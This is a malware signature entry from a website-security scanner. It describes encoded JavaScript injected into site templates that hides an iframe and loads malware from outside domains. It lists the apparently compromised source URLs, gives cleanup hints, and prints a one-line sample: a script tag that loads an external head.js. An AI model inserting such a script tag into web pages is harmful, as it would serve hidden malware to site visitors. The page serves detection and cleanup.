SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframehd187

malware-entry-mwiframehd187

Description:

Javascript encoded code used to hide an iframe from:

http://www.rkmceylon.org/templates/head.js
http://www.trevorgordon.co.uk/components/com_stats/voli277ac4.php (and other domains)

This is used to load malware from external web sites while not being visible to the user.

Affecting:

Any web site.

Clean up:

This malware is generally hidden inside the template footer or header.

Malware dump (sample of malware):

< script type="text/javascript" src="http://www.rkmceylon.org/templates/head.js"